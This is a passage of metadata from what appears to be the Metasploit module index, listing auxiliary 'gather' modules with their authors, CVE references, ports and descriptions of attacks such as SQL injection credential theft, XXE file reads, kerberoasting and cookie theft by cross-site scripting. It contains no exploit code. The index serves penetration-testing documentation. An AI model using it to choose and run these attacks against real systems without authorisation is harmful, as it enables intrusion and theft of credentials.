"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to brute force program names within the Citrix\n Metaframe ICA server.",
"references": [
"OSVDB-50617",
"BID-5817"
],
"platform": "",
"arch": "",
"rport": 1604,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/gather/citrix_published_bruteforce.rb",
"is_install_path": true,
"ref_name": "gather/citrix_published_bruteforce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/coldfusion_pwd_props": {
"name": "ColdFusion 'password.properties' Hash Extraction",
"full_name": "auxiliary/gather/coldfusion_pwd_props",
"rank": 300,
"disclosure_date": "2013-05-07",
"type": "auxiliary",
"author": [
"HTP",
"sinn3r <sinn3r@metasploit.com>",
"nebulus"
],
"description": "This module uses a directory traversal vulnerability to extract information\n such as password, rdspassword, and \"encrypted\" properties. This module has been\n tested successfully on ColdFusion 9 and ColdFusion 10. Use actions to select the\n target ColdFusion version.",
"references": [
"CVE-2013-3336",
"OSVDB-93114",
"EDB-25305"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/gather/coldfusion_pwd_props.rb",
"is_install_path": true,
"ref_name": "gather/coldfusion_pwd_props",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/corpwatch_lookup_id": {
"name": "CorpWatch Company ID Information Search",
"full_name": "auxiliary/gather/corpwatch_lookup_id",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module interfaces with the CorpWatch API to get publicly available\n info for a given CorpWatch ID of the company. If you don't know the\n CorpWatch ID, please use the corpwatch_lookup_name module first.",
"references": [
"URL-http://api.corpwatch.org/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 04:43:03 +0000",
"path": "/modules/auxiliary/gather/corpwatch_lookup_id.rb",
"is_install_path": true,
"ref_name": "gather/corpwatch_lookup_id",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/corpwatch_lookup_name": {
"name": "CorpWatch Company Name Information Search",
"full_name": "auxiliary/gather/corpwatch_lookup_name",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module interfaces with the CorpWatch API to get publicly available\n info for a given company name. Please note that by using CorpWatch API, you\n acknowledge the limitations of the data CorpWatch provides, and should always\n verify the information with the official SEC filings before taking any action.",
"references": [
"URL-http://api.corpwatch.org/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 04:43:03 +0000",
"path": "/modules/auxiliary/gather/corpwatch_lookup_name.rb",
"is_install_path": true,
"ref_name": "gather/corpwatch_lookup_name",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/d20pass": {
"name": "General Electric D20 Password Recovery",
"full_name": "auxiliary/gather/d20pass",
"rank": 300,
"disclosure_date": "2012-01-19",
"type": "auxiliary",
"author": [
"K. Reid Wightman <wightman@digitalbond.com>"
],
"description": "The General Electric D20ME and possibly other units (D200?) feature\n TFTP readable configurations with plaintext passwords. This module\n retrieves the username, password, and authentication level list.",
"references": [
"CVE-2012-6663"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/d20pass.rb",
"is_install_path": true,
"ref_name": "gather/d20pass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/darkcomet_filedownloader": {
"name": "DarkComet Server Remote File Download Exploit",
"full_name": "auxiliary/gather/darkcomet_filedownloader",
"rank": 300,
"disclosure_date": "2012-10-08",
"type": "auxiliary",
"author": [
"Shawn Denbow & Jesse Hertz",
"Jos Wetzels"
],
"description": "This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.\n The exploit does not need to know the password chosen for the bot/server communication.",
"references": [
"URL-https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf",
"URL-http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware"
],
"platform": "Windows",
"arch": "",
"rport": 1604,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/darkcomet_filedownloader.rb",
"is_install_path": true,
"ref_name": "gather/darkcomet_filedownloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/dolibarr_creds_sqli": {
"name": "Dolibarr Gather Credentials via SQL Injection",
"full_name": "auxiliary/gather/dolibarr_creds_sqli",
"rank": 300,
"disclosure_date": "2018-05-30",
"type": "auxiliary",
"author": [
"Issam Rabhi",
"Kevin Locati",
"Shelby Pace"
],
"description": "This module enables an authenticated user to collect the usernames and\n encrypted passwords of other users in the Dolibarr ERP/CRM via SQL\n injection.",
"references": [
"CVE-2018-10094",
"EDB-44805"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-19 22:15:14 +0000",
"path": "/modules/auxiliary/gather/dolibarr_creds_sqli.rb",
"is_install_path": true,
"ref_name": "gather/dolibarr_creds_sqli",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/doliwamp_traversal_creds": {
"name": "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
"full_name": "auxiliary/gather/doliwamp_traversal_creds",
"rank": 300,
"disclosure_date": "2014-01-12",
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module will extract user credentials from DoliWamp - a WAMP\n packaged installer distribution for Dolibarr ERP on Windows - versions\n 3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session\n tokens in filenames in the 'tmp' directory. A directory traversal\n vulnerability in 'jqueryFileTree.php' allows unauthenticated users\n to retrieve session tokens by listing the contents of this directory.\n Note: All tokens expire after 30 minutes of inactivity by default.",
"references": [
"URL-https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144",
"URL-https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/gather/doliwamp_traversal_creds.rb",
"is_install_path": true,
"ref_name": "gather/doliwamp_traversal_creds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/drupal_openid_xxe": {
"name": "Drupal OpenID External Entity Injection",
"full_name": "auxiliary/gather/drupal_openid_xxe",
"rank": 300,
"disclosure_date": "2012-10-17",
"type": "auxiliary",
"author": [
"Reginaldo Silva",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses an XML External Entity Injection\n vulnerability on the OpenID module from Drupal. The vulnerability exists\n in the parsing of a malformed XRDS file coming from a malicious OpenID\n endpoint. This module has been tested successfully on Drupal 7.15 and\n 7.2 with the OpenID module enabled.",
"references": [
"CVE-2012-4554",
"OSVDB-86429",
"BID-56103",
"URL-https://drupal.org/node/1815912",
"URL-http://drupalcode.org/project/drupal.git/commit/b912710",
"URL-http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/drupal_openid_xxe.rb",
"is_install_path": true,
"ref_name": "gather/drupal_openid_xxe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/eaton_nsm_creds": {
"name": "Network Shutdown Module sort_values Credential Dumper",
"full_name": "auxiliary/gather/eaton_nsm_creds",
"rank": 300,
"disclosure_date": "2012-06-26",
"type": "auxiliary",
"author": [
"h0ng10",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will extract user credentials from Network Shutdown Module\n versions 3.21 and earlier by exploiting a vulnerability found in\n lib/dbtools.inc, which uses unsanitized user input inside a eval() call.\n Please note that in order to extract credentials, the vulnerable service\n must have at least one USV module (an entry in the \"nodes\" table in\n mgedb.db).",
"references": [
"OSVDB-83199",
"URL-http://secunia.com/advisories/49103/"
],
"platform": "",
"arch": "",
"rport": 4679,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/gather/eaton_nsm_creds.rb",
"is_install_path": true,
"ref_name": "gather/eaton_nsm_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/emc_cta_xxe": {
"name": "EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read",
"full_name": "auxiliary/gather/emc_cta_xxe",
"rank": 300,
"disclosure_date": "2014-03-31",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "EMC CTA v10.0 is susceptible to an unauthenticated XXE attack\n that allows an attacker to read arbitrary files from the file system\n with the permissions of the root user.",
"references": [
"CVE-2014-0644",
"EDB-32623"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/gather/emc_cta_xxe.rb",
"is_install_path": true,
"ref_name": "gather/emc_cta_xxe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/enum_dns": {
"name": "DNS Record Scanner and Enumerator",
"full_name": "auxiliary/gather/enum_dns",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Nixawk"
],
"description": "This module can be used to gather information about a domain from a\n given DNS server by performing various DNS queries such as zone\n transfers, reverse lookups, SRV record brute forcing, and other techniques.",
"references": [
"CVE-1999-0532",
"OSVDB-492"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-15 15:38:56 +0000",
"path": "/modules/auxiliary/gather/enum_dns.rb",
"is_install_path": true,
"ref_name": "gather/enum_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/eventlog_cred_disclosure": {
"name": "ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure",
"full_name": "auxiliary/gather/eventlog_cred_disclosure",
"rank": 300,
"disclosure_date": "2014-11-05",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that\n allow an unauthenticated user to obtain the superuser password of any managed Windows and\n AS/400 hosts. This module abuses both vulnerabilities to collect all the available\n usernames and passwords. First the agentHandler servlet is abused to get the hostid and\n slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames\n and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,\n the TARGETURI has to be prepended with /event.",
"references": [
"CVE-2014-6038",
"CVE-2014-6039",
"OSVDB-114342",
"OSVDB-114344",
"URL-https://seclists.org/fulldisclosure/2014/Nov/12"
],
"platform": "",
"arch": "",
"rport": 8400,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/eventlog_cred_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/eventlog_cred_disclosure",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/external_ip": {
"name": "Discover External IP via Ifconfig.me",
"full_name": "auxiliary/gather/external_ip",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"RageLtMan"
],
"description": "This module checks for the public source IP address of the current\n route to the RHOST by querying the public web application at ifconfig.me.\n It should be noted this module will register activity on ifconfig.me,\n which is not affiliated with Metasploit.",
"references": [
"URL-http://ifconfig.me/ip"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/external_ip.rb",
"is_install_path": true,
"ref_name": "gather/external_ip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/f5_bigip_cookie_disclosure": {
"name": "F5 BigIP Backend Cookie Disclosure",
"full_name": "auxiliary/gather/f5_bigip_cookie_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Thanat0s <thanspam@trollprod.org>",
"Oleg Broslavsky <ovbroslavsky@gmail.com>",
"Nikita Oleksov <neoleksov@gmail.com>",
"Denis Kolegov <dnkolegov@gmail.com>"
],
"description": "This module identifies F5 BigIP load balancers and leaks backend\n information (pool name, backend's IP address and port, routed domain)\n through cookies inserted by the BigIP system.",
"references": [
"URL-http://support.f5.com/kb/en-us/solutions/public/6000/900/sol6917.html",
"URL-http://support.f5.com/kb/en-us/solutions/public/7000/700/sol7784.html?sr=14607726"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/f5_bigip_cookie_disclosure",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/firefox_pdfjs_file_theft": {
"name": "Firefox PDF.js Browser File Theft",
"full_name": "auxiliary/gather/firefox_pdfjs_file_theft",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Unknown",
"fukusa",
"Unknown"
],
"description": "This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR\n 38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability\n occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with\n privileges to read local files. The in-the-wild malicious payloads searched for sensitive\n files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they\n do not use the Mozilla PDF viewer.",
"references": [
"URL-https://paste.debian.net/290146",
"URL-https://news.ycombinator.com/item?id=10021376",
"URL-https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/",
"CVE-2015-4495"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb",
"is_install_path": true,
"ref_name": "gather/firefox_pdfjs_file_theft",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/flash_rosetta_jsonp_url_disclosure": {
"name": "Flash \"Rosetta\" JSONP GET/POST Response Disclosure",
"full_name": "auxiliary/gather/flash_rosetta_jsonp_url_disclosure",
"rank": 300,
"disclosure_date": "2014-07-08",
"type": "auxiliary",
"author": [
"Michele Spagnuolo",
"joev <joev@metasploit.com>"
],
"description": "A website that serves a JSONP endpoint that accepts a custom alphanumeric\n callback of 1200 chars can be abused to serve an encoded swf payload that\n steals the contents of a same-domain URL. Flash < 14.0.0.145 is required.\n\n This module spins up a web server that, upon navigation from a user, attempts\n to abuse the specified JSONP endpoint URLs by stealing the response from\n GET requests to STEAL_URLS.",
"references": [
"CVE-2014-4671",
"URL-http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/",
"URL-https://github.com/mikispag/rosettaflash",
"URL-http://quaxio.com/jsonp_handcrafted_flash_files/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/flash_rosetta_jsonp_url_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/get_user_spns": {
"name": "Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)",
"full_name": "auxiliary/gather/get_user_spns",
"rank": 300,
"disclosure_date": "2014-09-27",
"type": "auxiliary",
"author": [
"Alberto Solino",
"Jacob Robles"
],
"description": "This module will try to find Service Principal Names that are associated with normal user accounts.\n Since normal accounts' passwords tend to be shorter than machine accounts, and knowing that a TGS request\n will encrypt the ticket with the account the SPN is running under, this could be used for an offline\n bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.\n This is part of the kerberoast attack research by Tim Medin (@timmedin).",
"references": [
"URL-https://github.com/CoreSecurity/impacket/blob/master/examples/GetUserSPNs.py",
"URL-https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/gather/get_user_spns.py",
"is_install_path": true,
"ref_name": "gather/get_user_spns",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"GetUserSPNs.py",
"Kerberoast"
]
}
},
"auxiliary_gather/hp_enum_perfd": {
"name": "HP Operations Manager Perfd Environment Scanner",
"full_name": "auxiliary/gather/hp_enum_perfd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module will enumerate the process list of a remote machine by abusing\n HP Operation Manager's unauthenticated 'perfd' daemon.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5227,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/hp_enum_perfd.rb",
"is_install_path": true,
"ref_name": "gather/hp_enum_perfd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/hp_snac_domain_creds": {
"name": "HP ProCurve SNAC Domain Controller Credential Dumper",
"full_name": "auxiliary/gather/hp_snac_domain_creds",
"rank": 300,
"disclosure_date": "2013-09-09",
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module will extract Domain Controller credentials from vulnerable installations of HP\n SNAC as distributed with HP ProCurve 4.00 and 3.20. The authentication bypass vulnerability\n has been used to exploit remote file uploads. This vulnerability can be used to gather important\n information handled by the vulnerable application, like plain text domain controller\n credentials. This module has been tested successfully with HP SNAC included with ProCurve\n Manager 4.0.",
"references": [
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/hp_snac_domain_creds.rb",
"is_install_path": true,
"ref_name": "gather/hp_snac_domain_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/http_pdf_authors": {
"name": "Gather PDF Authors",
"full_name": "auxiliary/gather/http_pdf_authors",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module downloads PDF documents and extracts the author's\n name from the document metadata.\n\n This module expects a URL to be provided using the URL option.\n Alternatively, multiple URLs can be provided by supplying the\n path to a file containing a list of URLs in the URL_LIST option.\n\n The URL_TYPE option is used to specify the type of URLs supplied.\n\n By specifying 'pdf' for the URL_TYPE, the module will treat\n the specified URL(s) as PDF documents. The module will\n download the documents and extract the authors' names from the\n document metadata.\n\n By specifying 'html' for the URL_TYPE, the module will treat\n the specified URL(s) as HTML pages. The module will scrape the\n pages for links to PDF documents, download the PDF documents,\n and extract the author's name from the document metadata.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 04:43:03 +0000",
"path": "/modules/auxiliary/gather/http_pdf_authors.rb",
"is_install_path": true,
"ref_name": "gather/http_pdf_authors",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/huawei_wifi_info": {
"name": "Huawei Datacard Information Disclosure Vulnerability",
"full_name": "auxiliary/gather/huawei_wifi_info",
"rank": 300,
"disclosure_date": "2013-11-11",
"type": "auxiliary",
"author": [
"Jimson K James",
"Tom James <tomsmaily@aczire.com>"
],
"description": "This module exploits an unauthenticated information disclosure vulnerability in Huawei\n SOHO routers. The module will gather information by accessing the /api pages where\n authentication is not required, allowing configuration changes as well as information\n disclosure, including any stored SMS.",
"references": [
"CWE-425",
"CVE-2013-6031",
"US-CERT-VU-341526"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/huawei_wifi_info.rb",
"is_install_path": true,
"ref_name": "gather/huawei_wifi_info",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ibm_bigfix_sites_packages_enum": {
"name": "IBM BigFix Relay Server Sites and Package Enum",
"full_name": "auxiliary/gather/ibm_bigfix_sites_packages_enum",
"rank": 300,
"disclosure_date": "2019-03-18",
"type": "auxiliary",
"author": [
"HD Moore",
"Chris Bellows",
"Ryan Hanson",
"Jacob Robles"
],
"description": "This module retrieves masthead, site, and available package information\n from IBM BigFix Relay Servers.",
"references": [
"CVE-2019-4061",
"URL-https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers"
],
"platform": "",
"arch": "",
"rport": 52311,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-19 12:53:27 +0000",
"path": "/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.rb",
"is_install_path": true,
"ref_name": "gather/ibm_bigfix_sites_packages_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ibm_sametime_enumerate_users": {
"name": "IBM Lotus Notes Sametime User Enumeration",
"full_name": "auxiliary/gather/ibm_sametime_enumerate_users",
"rank": 300,
"disclosure_date": "2013-12-27",
"type": "auxiliary",
"author": [
"kicks4kittens"
],
"description": "This module extracts usernames using the IBM Lotus Notes Sametime web\n interface using either a dictionary attack (which is preferred), or a\n bruteforce attack trying all usernames of MAXDEPTH length or less.",
"references": [
"CVE-2013-3975",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21671201"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb",
"is_install_path": true,
"ref_name": "gather/ibm_sametime_enumerate_users",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ibm_sametime_room_brute": {
"name": "IBM Lotus Notes Sametime Room Name Bruteforce",
"full_name": "auxiliary/gather/ibm_sametime_room_brute",
"rank": 300,
"disclosure_date": "2013-12-27",
"type": "auxiliary",
"author": [
"kicks4kittens"
],
"description": "This module bruteforces Sametime meeting room names via the IBM\n Lotus Notes Sametime web interface.",
"references": [
"CVE-2013-3977",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21671201"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ibm_sametime_room_brute.rb",
"is_install_path": true,
"ref_name": "gather/ibm_sametime_room_brute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ibm_sametime_version": {
"name": "IBM Lotus Sametime Version Enumeration",
"full_name": "auxiliary/gather/ibm_sametime_version",
"rank": 300,
"disclosure_date": "2013-12-27",
"type": "auxiliary",
"author": [
"kicks4kittens"
],
"description": "This module scans an IBM Lotus Sametime web interface to enumerate\n the application's version and configuration information.",
"references": [
"CVE-2013-3982",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21671201"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ibm_sametime_version.rb",
"is_install_path": true,
"ref_name": "gather/ibm_sametime_version",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ie_sandbox_findfiles": {
"name": "Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability",
"full_name": "auxiliary/gather/ie_sandbox_findfiles",
"rank": 300,
"disclosure_date": "2016-08-09",
"type": "auxiliary",
"author": [
"Yorick Koster"
],
"description": "It was found that Internet Explorer allows the disclosure of local file names.\n This issue exists due to the fact that Internet Explorer behaves different for\n file:// URLs pointing to existing and non-existent files. When used in\n combination with HTML5 sandbox iframes it is possible to use this behavior to\n find out if a local file exists. This technique only works on Internet Explorer\n 10 & 11 since these support the HTML5 sandbox. Also it is not possible to do\n this from a regular website as file:// URLs are blocked all together. The attack\n must be performed locally (works with Internet zone Mark of the Web) or from a\n share.",
"references": [
"CVE-2016-3321",
"MSB-MS16-095",
"URL-https://securify.nl/advisory/SFY20160301/internet_explorer_iframe_sandbox_local_file_name_disclosure_vulnerability.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ie_sandbox_findfiles.rb",
"is_install_path": true,
"ref_name": "gather/ie_sandbox_findfiles",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ie_uxss_injection": {
"name": "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
"full_name": "auxiliary/gather/ie_uxss_injection",
"rank": 300,
"disclosure_date": "2015-02-01",
"type": "auxiliary",
"author": [
"David Leo",
"filedescriptor",
"joev <joev@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet\n Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot\n have X-Frame-Options or it will fail). You can also have your own custom JavaScript\n by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if\n you are behind NAT.",
"references": [
"CVE-2015-0072",
"OSVDB-117876",
"MSB-MS15-018",
"URL-http://innerht.ml/blog/ie-uxss.html",
"URL-https://seclists.org/fulldisclosure/2015/Feb/10"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/ie_uxss_injection.rb",
"is_install_path": true,
"ref_name": "gather/ie_uxss_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/impersonate_ssl": {
"name": "HTTP SSL Certificate Impersonation",
"full_name": "auxiliary/gather/impersonate_ssl",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module request a copy of the remote SSL certificate and creates a local\n (self.signed) version using the information from the remote version. The module\n then Outputs (PEM|DER) format private key / certificate and a combined version\n for use in Apache or other Metasploit modules requiring SSLCert Inputs for private\n key / CA cert have been provided for those with DigiNotar certs hanging about!",
"references": [
"URL-http://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles"
],
"platform": "",
"arch": "",
"rport": 443,
